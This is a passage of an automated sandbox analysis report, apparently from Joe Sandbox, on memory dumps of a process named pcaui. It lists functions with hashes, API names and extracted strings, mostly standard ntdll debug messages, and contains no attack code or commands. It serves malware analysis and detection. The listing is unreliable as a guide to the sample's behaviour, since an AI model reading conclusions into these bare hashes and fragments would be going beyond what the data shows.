                                                                                    • Opcode Fuzzy Hash: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                    • Instruction Fuzzy Hash: 45D05E7D7903043BF640E6E88C47F16328D9B05794F058069B90DF7AC1EE64F1404AA7
                                                                                    Function 047D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                    • Instruction ID: 57df64a5c42254a19fc7cfeb81c6bc5aec495e8fdeadec86496b270deee7fe6a
                                                                                    • Opcode Fuzzy Hash: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                    • Instruction Fuzzy Hash: 9CB09B719015C5C5FB11F760460871779106BD0705F16C171D2070761F4738D5D5F176

                                                                                    Non-executed Functions

                                                                                    Function 046604E8 Relevance: .1, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468020584.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4660000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d8d57cf1da3adc5be78d5bbf9d06d32d62fd4e96017ce3f93e6d72d8de9ab0d
                                                                                    • Instruction ID: f8dd7c9970ecad241bf82234a589fc706bb198e4b1e2588449b25dde3c880d68
                                                                                    • Opcode Fuzzy Hash: 9d8d57cf1da3adc5be78d5bbf9d06d32d62fd4e96017ce3f93e6d72d8de9ab0d
                                                                                    • Instruction Fuzzy Hash: 6241A270618B494FD368EF689081676B3E2FB95304F500A3ED98BC3252FA71E8468689
                                                                                    Function 0466DF69 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468020584.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4660000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                    • API String ID: 0-3558027158
                                                                                    • Opcode ID: e4eec1d762e51e22950394cb580eb97dba334b39a4181834493c555fc7b4da90
                                                                                    • Instruction ID: 5ffd4f961fac06accfcc5cf1785a496cafc685ff42278e0e3bf3786d38f273d5
                                                                                    • Opcode Fuzzy Hash: e4eec1d762e51e22950394cb580eb97dba334b39a4181834493c555fc7b4da90
                                                                                    • Instruction Fuzzy Hash: 319151F04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                    Function 047D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
                                                                                    • Instruction ID: 22de4f3df5bf9cc9deb5cab215b5011425ceaee26e1401b045d01fdba9ab4f62
                                                                                    • Opcode Fuzzy Hash: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
                                                                                    • Instruction Fuzzy Hash: 5D510AB1B14256BFDB20DFA9C88097EF7B8BB08204710C669E455E7746E274FE018BA0
                                                                                    Function 04842410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    • Opcode ID: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
                                                                                    • Instruction ID: a71457b1bffb4751888cda59f66cb4077c03f57ffa54d9357fadc8f701a5e5ce
                                                                                    • Opcode Fuzzy Hash: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
                                                                                    • Instruction Fuzzy Hash: A2510671A0464DAFDB30DE9CC89097FB7F8EF88244B008999F495D3641E6B4FA40CB60
                                                                                    Function 047C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04804787
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04804655
                                                                                    • Execute=1, xrefs: 04804713
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048046FC
                                                                                    • ExecuteOptions, xrefs: 048046A0
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04804742
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04804725
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
                                                                                    • Instruction ID: ab6313470633d02c2e18fa4962ecac7549c0efedb0c630b39e0a46002ea2eaa4
                                                                                    • Opcode Fuzzy Hash: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
                                                                                    • Instruction Fuzzy Hash: 0A51167164021EABEF14AAA9DC89BA977B8EF04704F4405ADE605A7390EB70BE458F50
                                                                                    Function 04866940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                    • Instruction ID: 92ab9a8e4ba637662a36ff7886ed40691e4ad024b1d7116561c6950694aa0936
                                                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                    • Instruction Fuzzy Hash: C4021471508381AFD345CF18C494A6ABBE5EFC8708F148E2DF98A9B254EB71E945CB42
                                                                                    Function 047DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction ID: 1d2c29b8b9de64d724dd1a1ebbad4a795d652bcc6124bfdd1da3950eaca96a10
                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                    • Instruction Fuzzy Hash: 3581E130E252499FDF24CF68C8907FEBBB5AF45360F1A425AE861A7391D734B840CB60
                                                                                    Function 048420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$[$]:%u
                                                                                    • API String ID: 48624451-2819853543
                                                                                    • Opcode ID: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                    • Instruction ID: 9954cbf3bb2ecb198fc97dfec3d1b6d789a2f8a759343377221ef8110f2caaff
                                                                                    • Opcode Fuzzy Hash: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
                                                                                    • Instruction Fuzzy Hash: FC215676A0011D9BDB10DFA9C8449BEB7F8EF84784F040656F915D3200E730F901CBA1
                                                                                    Function 047BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 0480031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048002BD
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048002E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                    • Instruction ID: 2dfffca65884f9dec258acf6251fd3bce5982128f2a08f550c6b4cf024587c94
                                                                                    • Opcode Fuzzy Hash: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
                                                                                    • Instruction Fuzzy Hash: B5E1BD306147419FD725CF28DC84B6AB7E0AB89718F144A5DE9A5CB3E1E774E844CB82
                                                                                    Function 047CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 04807BAC
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04807B7F
                                                                                    • RTL: Resource at %p, xrefs: 04807B8E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    • Opcode ID: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                    • Instruction ID: 57969e09a7a95a9e0b78e4861aed8b9efb63837c2848bdbaca3cb9cfd703ba7e
                                                                                    • Opcode Fuzzy Hash: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
                                                                                    • Instruction Fuzzy Hash: 9E41BD317007029FDB24DE29DC51B6AB7E5EB88714F100A2DF95ADB780DB71F8458B91
                                                                                    Function 047CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480728C
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 048072C1
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04807294
                                                                                    • RTL: Resource at %p, xrefs: 048072A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    • Opcode ID: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                    • Instruction ID: 4c962a64e8c1a11d3513c4cc65334912f5eb4c3c1a887a1375b316fd49adbd1c
                                                                                    • Opcode Fuzzy Hash: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                    • Instruction Fuzzy Hash: 9F41EF71704216ABD720DE25DC42B66B7A5FB84714F104B1DFA56EB380EB30F8528BD1
                                                                                    Function 04842300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    • Opcode ID: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                    • Instruction ID: ae8647bd267320a5a19d1ba1a0846ec3ccbd85b241b9479a6a564110fecd7e70
                                                                                    • Opcode Fuzzy Hash: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                    • Instruction Fuzzy Hash: 7D31457260061D9FDB20DF2DCC44BAEB7B8EB44754F444995E849E3240EB31BA448B61
                                                                                    Function 047D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: ff0b5460fa5dc5610cf1d2d6d8c9036e395af9cd8b83a670e2a4c1f1e99d862a
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: F1918271E202169BDF3CDE69C881ABEB7B5EF44720F54491AE865EB3C0E730A9418761
                                                                                    Function 04799126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                    • Instruction ID: f863d8b42fb40ff9630054135117c4f3dbed7dbff1843afedba06ef8e3ea0fad
                                                                                    • Opcode Fuzzy Hash: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                    • Instruction Fuzzy Hash: 3A810AB1D002699BDB35CB54CC45BEAB7B4AB48714F0045DAEA19B7780E731AE84DFA0
                                                                                    Function 04663B2F Relevance: 5.0, Strings: 4, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468020584.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4660000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 95qp$p$ro|e$syta
                                                                                    • API String ID: 0-2460837372
                                                                                    • Opcode ID: 33eddae6a5e13a3b1b72197834273e0663856a9df791c688360b197c797f9f4e
                                                                                    • Instruction ID: f66c458c1d9201cecd1aada9593ac01fb190d59772be86dff03e1ab6f5164989
                                                                                    • Opcode Fuzzy Hash: 33eddae6a5e13a3b1b72197834273e0663856a9df791c688360b197c797f9f4e
                                                                                    • Instruction Fuzzy Hash: 2AF0273001C7C48BC705AF24C044799BBE1FFD930CF9006ADE8CADB291EA7A9641C78A